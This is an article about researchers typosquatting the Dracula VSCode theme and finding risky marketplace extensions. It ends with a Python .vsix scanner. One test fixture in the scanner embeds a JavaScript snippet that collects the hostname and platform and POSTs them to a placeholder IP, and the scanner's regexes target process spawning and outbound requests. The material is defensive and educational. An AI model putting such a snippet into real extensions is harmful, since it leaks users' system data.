The Hidden Risks of Visual Studio Code Marketplace: A Wake-Up Call

Visual Studio Code (VSCode), a highly popular source code editor developed by Microsoft, is a staple in the professional software development community. Central to its widespread appeal is the Visual Studio Code Marketplace, which offers thousands of extensions that extend its functionality. However, recent research by a team of Israeli cybersecurity experts has exposed significant weaknesses in how the marketplace vets publishers and extension code, highlighting a potential security crisis.


The Experiment: Typosquatting the Dracula Theme

The Setup

Researchers set out to explore the security landscape of the VSCode Marketplace. They chose a highly popular extension, the ‘Dracula Official’ theme, which boasts over 7 million installs, as their target. They created a lookalike extension named ‘Darcula’ and registered the domain ‘darculatheme.com.’ Because the marketplace’s verified-publisher checkmark attests only that a publisher controls a domain, not that the publisher or its code is trustworthy, this was enough for the copycat to appear as a verified publisher on the marketplace.

Figure 1 The Darcula extension on the VSCode Marketplace

The Findings

The fake ‘Darcula’ extension included the legitimate code from the original Dracula theme but also added a script that collected sensitive system information, such as hostname, installed extensions, device domain name, and operating system platform. This data was sent to a remote server via HTTPS POST requests. A colour theme is pure JSON and needs no executable code at all, so the mere presence of a script in a theme extension is itself a red flag that nobody checked.

Astonishingly, the malicious code was not flagged by endpoint detection and response (EDR) tools. EDR products commonly treat the editor and its child processes as trusted developer tooling, so an extension’s outbound connections and process activity inherit that trust. Consequently, the fake extension was installed by over 100 high-value targets, including major corporations and a national justice court network.

Figure 2 Risky code added to the Darcula extension

VSCode Marketplace: A Breeding Ground for Malicious Extensions

Following their successful experiment, the researchers delved deeper into the VSCode Marketplace, using a custom tool called ‘ExtensionTotal’ to identify high-risk extensions. The results were alarming:

  • 1,283 extensions with known malicious code, totalling 229 million installs.
  • 8,161 extensions communicating with hardcoded IP addresses.
  • 1,452 extensions running unknown executables.
  • 2,304 extensions using another publisher’s GitHub repository, indicating potential copycats.

These findings underscore the significant security gaps in the marketplace, where the lack of meaningful publisher vetting and of any mandatory code review on Microsoft’s side has allowed abuse to go unchecked.

The Impact and Response

The researchers responsibly reported all detected malicious extensions to Microsoft for removal. Despite this, the vast majority of these extensions remain available for download. This situation highlights the urgent need for improved security measures in the VSCode Marketplace.

Security Measures

While this incident raises concerns, there are steps developers can take to fortify their development environment:

  • Strict Scrutiny: Don’t be swayed by popularity or a verified checkmark alone; the badge proves only domain ownership, and install counts can be inherited by a copycat. Check the exact extension identifier (publisher.name) against the link on the project’s official site or GitHub repository, and research the developer and reviews before installing.
  • Least Privilege: VSCode has no per-extension permission model. Every extension runs in the extension host with the full privileges of the user running the editor, so it can read any file, spawn any process, and open any network connection that user can. Least privilege therefore has to be applied to the editor itself: run it as an unprivileged user, keep credentials out of the workspace, and keep Workspace Trust enabled so that most extensions stay inactive in folders you have not explicitly trusted.
  • Sandboxing: Test untrusted extensions in a throwaway environment, such as a Dev Container or a disposable virtual machine, before allowing them in your primary development environment.
  • Security Tools: An extension package (.vsix) is a zip archive, so it can be downloaded and inspected before installation. Look at the manifest’s main entry and activation events, any JavaScript shipped by an extension that should need none (such as a theme), and indicators such as hardcoded IP addresses, use of child_process, and outbound HTTP requests.
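The checks in the last two bullets, and the indicators counted in the survey above (hardcoded IP addresses, spawned executables, copycat names), can be scripted. The following is an added example written for this page; it is not the researchers’ ExtensionTotal tool and not code from the original article. It unpacks a .vsix in memory (a zip whose manifest sits at extension/package.json), scans any JavaScript for those indicators, flags a theme that ships executable code, and compares the extension ID against an allowlist to catch near-miss names. The allowlist, both sample packages, the ‘darcula-theme’ publisher ID and the 203.0.113.10 address (a documentation range) are all constructed for the example.

```python
"""Offline triage of a VS Code extension package (.vsix) before installing it.
Added example; the allowlist and both sample packages are constructed."""
import io
import json
import re
import zipfile
from difflib import SequenceMatcher

# Constructed allowlist of approved extension IDs (publisher.name).
KNOWN_GOOD = {
    "dracula-theme.theme-dracula",
    "ms-python.python",
    "esbenp.prettier-vscode",
}

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
EXEC_RE = re.compile(r"child_process|\b(?:exec|execSync|execFile|spawn|spawnSync)\s*\(")
NET_RE = re.compile(r"\bhttps?\.request\s*\(|\bfetch\s*\(|\baxios\.(?:post|get|request)\s*\(")
CODE_EXT = (".js", ".cjs", ".mjs")


def lookalike(ext_id, known=KNOWN_GOOD, threshold=0.85):
    """Return the approved ID this one most resembles when it is a near miss
    rather than an exact match; None for exact matches and unrelated IDs."""
    if ext_id in known:
        return None
    ratio = lambda k: SequenceMatcher(None, ext_id.lower(), k.lower()).ratio()
    best = max(known, key=ratio)
    return best if ratio(best) >= threshold else None


def scan_vsix(data):
    """Return a dict of indicators found in the given .vsix bytes."""
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        manifest = json.loads(z.read("extension/package.json"))
        ext_id = f"{manifest['publisher']}.{manifest['name']}"
        ips, exec_files, net_files, code_files = set(), [], [], []
        for name in z.namelist():
            if not name.endswith(CODE_EXT):
                continue
            code_files.append(name)
            src = z.read(name).decode("utf-8", errors="replace")
            ips.update(IPV4_RE.findall(src))
            if EXEC_RE.search(src):
                exec_files.append(name)
            if NET_RE.search(src):
                net_files.append(name)
    # A colour theme contributes only themes and needs no code: a 'main'
    # entry or any JavaScript in such a package is suspect.
    only_theme = set(manifest.get("contributes", {})) == {"themes"}
    theme_with_code = only_theme and bool(manifest.get("main") or code_files)
    return {
        "id": ext_id,
        "lookalike": lookalike(ext_id),
        "hardcoded_ips": sorted(ips),
        "spawns_processes": exec_files,
        "makes_requests": net_files,
        "theme_with_code": theme_with_code,
    }


def risk_reasons(report):
    """Reasons to block the extension; an empty list means no findings."""
    reasons = []
    if report["lookalike"]:
        reasons.append(f"ID resembles approved extension {report['lookalike']}")
    if report["theme_with_code"]:
        reasons.append("theme extension ships executable code")
    if report["hardcoded_ips"]:
        reasons.append("hardcoded IP address(es): " + ", ".join(report["hardcoded_ips"]))
    if report["spawns_processes"]:
        reasons.append("spawns processes in: " + ", ".join(report["spawns_processes"]))
    if report["makes_requests"]:
        reasons.append("makes network requests in: " + ", ".join(report["makes_requests"]))
    return reasons


def build_vsix(manifest, files):
    """Assemble an in-memory .vsix (zip) from a manifest and extra files (fixture)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("extension/package.json", json.dumps(manifest))
        for path, content in files.items():
            z.writestr("extension/" + path, content)
    return buf.getvalue()


# Constructed fixture 1: a plain colour theme, JSON only.
BENIGN_VSIX = build_vsix(
    {"publisher": "dracula-theme", "name": "theme-dracula",
     "contributes": {"themes": [{"path": "./themes/dracula.json"}]}},
    {"themes/dracula.json": '{"name": "Dracula", "colors": {}}'},
)

# Constructed fixture 2: a lookalike theme that also registers a main module
# collecting host details and POSTing them to a hardcoded TEST-NET address.
LOOKALIKE_VSIX = build_vsix(
    {"publisher": "darcula-theme", "name": "theme-darcula", "main": "./extension.js",
     "contributes": {"themes": [{"path": "./themes/darcula.json"}]}},
    {"themes/darcula.json": '{"name": "Darcula", "colors": {}}',
     "extension.js": (
         'const os = require("os"); const https = require("https");\n'
         'function activate() {\n'
         '  const body = JSON.stringify({host: os.hostname(), platform: os.platform()});\n'
         '  const req = https.request({host: "203.0.113.10", method: "POST", path: "/c"});\n'
         '  req.end(body);\n'
         '}\nmodule.exports = { activate };\n'
     )},
)

if __name__ == "__main__":
    for label, pkg in (("benign", BENIGN_VSIX), ("lookalike", LOOKALIKE_VSIX)):
        report = scan_vsix(pkg)
        print(label, report["id"], risk_reasons(report) or "no findings")
```

The name check is deliberately a near-miss detector: an exact match to the allowlist passes, an unrelated ID is left to the other checks, and only IDs that are almost but not quite an approved one are reported, which is exactly the shape a typosquat takes. To run it against a real package, download the .vsix from the marketplace and pass its bytes to scan_vsix; the IPv4 regex will also catch four-part version strings, so treat that finding as a prompt to read the surrounding code rather than as proof on its own.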

The Future of VSCode Marketplace Security

The research team plans to release their ‘ExtensionTotal’ tool next week, providing developers with a free resource to scan their environments for potential threats. This proactive step aims to help the developer community safeguard against the risks posed by malicious extensions.

Conclusion

The Visual Studio Code Marketplace’s vulnerabilities present a clear and present danger to organizations worldwide. The ease with which the researchers were able to infiltrate high-value targets through a simple typosquatting attack on a popular theme extension highlights the urgent need for enhanced security measures. Developers and organizations must remain vigilant and utilize tools like ‘ExtensionTotal’ to protect their environments from these hidden threats. As the VSCode Marketplace continues to grow, addressing these security issues must become a priority for Microsoft and the broader cybersecurity community.